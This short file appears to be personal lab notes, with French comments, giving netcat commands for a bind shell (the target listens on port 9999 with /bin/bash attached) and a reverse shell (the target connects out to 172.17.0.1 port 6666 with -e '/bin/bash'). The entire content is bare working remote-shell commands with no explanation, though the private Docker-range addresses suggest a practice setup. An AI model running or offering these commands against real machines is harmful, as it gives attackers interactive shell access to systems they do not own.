

# cible 172.17.0.2
nc -l -p 9999 -e /bin/bash

# local 172.17.0.1
nc 172.17.0.2 9999



#####################################

#source  172.17.0.1

nc -l -p 6666

#cible 172.17.0.2

nc 172.17.0.1 6666 -e '/bin/bash'



